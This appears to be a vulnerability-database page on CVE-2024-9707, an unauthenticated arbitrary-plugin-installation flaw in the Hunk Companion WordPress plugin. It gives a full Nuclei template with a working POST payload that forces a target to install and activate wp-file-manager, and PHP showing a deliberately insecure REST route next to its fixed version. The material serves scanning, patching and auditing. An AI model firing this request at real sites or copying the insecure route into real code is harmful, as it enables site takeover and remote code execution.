| Title | Published | Family |
|---|---|---|
| Exploit for Missing Authorization in Themehunk Hunk_Companion | 11 Oct 2024 06:21 | githubexploit |
| Exploit for Missing Authorization in Themehunk Hunk_Companion | 12 Jan 2025 23:35 | githubexploit |
| CVE-2024-9707 | 11 Oct 2024 16:10 | circl |
| WordPress plugin Hunk Companion security vulnerability | 11 Oct 2024 00:00 | cnnvd |
| CVE-2024-9707 | 11 Oct 2024 06:50 | cve |
| CVE-2024-9707 Hunk Companion <= 1.8.4 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation | 11 Oct 2024 06:50 | cvelist |
| CVE-2024-9707 | 11 Oct 2024 13:15 | nvd |
| WordPress Hunk Companion Plugin <= 1.8.4 is vulnerable to Broken Access Control | 10 Oct 2024 00:00 | patchstack |
| WordPress Hunk Companion plugin <= 1.8.4 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation vulnerability | 10 Oct 2024 20:14 | patchstack |
| PT-2024-39774 | 11 Oct 2024 00:00 | ptsecurity |
Nuclei template for this issue (indentation restored; the raw request needs the blank line between headers and the JSON body, which the flattened copy had lost):

```yaml
id: CVE-2024-9707

info:
  name: Hunk Companion <= 1.8.4 - Arbitrary Plugin Installation
  author: DhiyaneshDK
  severity: critical
  description: |
    The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.
  impact: |
    Unauthenticated attackers can install and activate arbitrary WordPress plugins, potentially achieving remote code execution if a vulnerable plugin is installed and activated on the target site.
  remediation: |
    Update the Hunk Companion plugin to a version later than 1.8.4 that implements proper capability checks on the /wp-json/hc/v1/themehunk-import REST API endpoint.
  reference:
    - https://wordpress.org/plugins/hunk-companion/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9c101fca-037c-4bed-9dc7-baa021a8b59c?source=cve
    - https://github.com/iSee857/CVE-PoC/blob/main/WordPress_Hunk_Companion(CVE-2024-9707).py
    - https://github.com/RandomRobbieBF/CVE-2024-9707
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9707
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9707
    cwe-id: CWE-862
    epss-score: 0.09137
    epss-percentile: 0.94672
    cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: themehunk
    product: hunk_companion
    framework: wordpress
    fofa-query: body="/wp-content/plugins/hunk-companion/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,hunk-companion,intrusive,vkev,vuln

http:
  - raw:
      - |
        POST /wp-json/hc/v1/themehunk-import HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params": {"templateType": "free", "plugin": {"wp-file-manager": "Wp File Manager"}, "allPlugins": [{"wp-file-manager": "wp-file-manager/wp-file-manager.php"}], "builder": "gogo", "themeSlug": "gogo", "proThemePlugin": "wp-file-manager", "tmplFreePro": "plugin", "wpUrl": "https://downloads.wordpress.org/", "thUrl": "https://themehunk.com/wp/data/"}}

    matchers-condition: and
    matchers:
      # The endpoint answers with a JSON document whose payload is itself
      # JSON-encoded, so the download URL appears with escaped slashes.
      - type: word
        part: body
        words:
          - '"\"https:\\\/\\\/'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205c441a0f77ddc83a797e6e60ef6386c66ef989ab56dbcdca46baea6dc4e1ecc0022100a6637635d50b8dc6c81c6f1e43c17c3b2234cf0a2be5e3be2f43db97533fa04f:922c64590222798bb761d5b6d8e72950
```

Note that the template is tagged `intrusive`: a successful match means the target actually fetched and activated the named plugin, which is a state change, not a read-only probe.
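The template shows the missing check from the attacker's side only. As an added example (not Hunk Companion's code and not part of the Nuclei template), the following PHP shows the WordPress REST pattern that produces a CWE-862 bug of this kind and the corrected form side by side: a route whose `permission_callback` is `__return_true` accepts unauthenticated callers, while the hardened route refuses anyone without the `install_plugins` and `activate_plugins` capabilities before the handler runs. The `example/v1` namespace, the route paths, the handler and callback names and the `slug` argument schema are assumptions made for illustration; the WordPress functions and classes used are real core APIs.

```php
<?php
// Added example, not the plugin's code. Route namespace, paths, function names
// and the `slug` argument are hypothetical; the WordPress APIs are core APIs.

// Vulnerable pattern (CWE-862): permission_callback always returns true, so an
// unauthenticated POST to /wp-json/example/v1/import-insecure reaches the handler.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/import-insecure', array(
        'methods'             => 'POST',
        'callback'            => 'example_import_plugin',
        'permission_callback' => '__return_true', // no capability check at all
    ) );
} );

// Hardened pattern: WordPress evaluates permission_callback before the handler.
// Return true to allow, or a WP_Error to refuse with 401/403.
function example_import_permission( WP_REST_Request $request ) {
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        return new WP_Error(
            'rest_forbidden',
            'You are not allowed to install or activate plugins.',
            // 401 for anonymous callers, 403 for logged-in users lacking the capability
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/import', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'example_import_plugin',
        'permission_callback' => 'example_import_permission',
        'args'                => array(
            'slug' => array(
                'required'          => true,
                'type'              => 'string',
                // Accept only WordPress.org-style slugs so the handler never
                // receives a path or URL chosen by the caller.
                'validate_callback' => function ( $value ) {
                    return is_string( $value ) && preg_match( '/^[a-z0-9-]{1,100}$/', $value ) === 1;
                },
                'sanitize_callback' => 'sanitize_key',
            ),
        ),
    ) );
} );

// Shared handler: resolve the slug via the WordPress.org plugin API, install
// the package it returns, then activate the resulting plugin file.
function example_import_plugin( WP_REST_Request $request ) {
    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';

    $slug = $request->get_param( 'slug' );
    $api  = plugins_api( 'plugin_information', array(
        'slug'   => $slug,
        'fields' => array( 'sections' => false ),
    ) );
    if ( is_wp_error( $api ) ) {
        return $api;
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );
    if ( is_wp_error( $result ) || ! $result ) {
        return new WP_Error( 'install_failed', 'Plugin installation failed.', array( 'status' => 500 ) );
    }

    $plugin_file = $upgrader->plugin_info();
    $activated   = activate_plugin( $plugin_file );
    if ( is_wp_error( $activated ) ) {
        return $activated;
    }

    return rest_ensure_response( array(
        'installed' => $plugin_file,
        'active'    => is_plugin_active( $plugin_file ),
    ) );
}
```

Two practical notes. First, the capability check only helps if the caller is actually authenticated: WordPress REST cookie authentication requires a valid `X-WP-Nonce` header, and without it the request is treated as anonymous, so `current_user_can()` returns false and the hardened route answers 401, which is the intended behaviour rather than a bug. Second, when auditing a plugin for this class of issue, grep its `register_rest_route` calls for `'__return_true'` or a missing `permission_callback` on any route whose handler writes state (installs, activates, changes options), and confirm the check names the specific capability the action needs, not merely `is_user_logged_in()`.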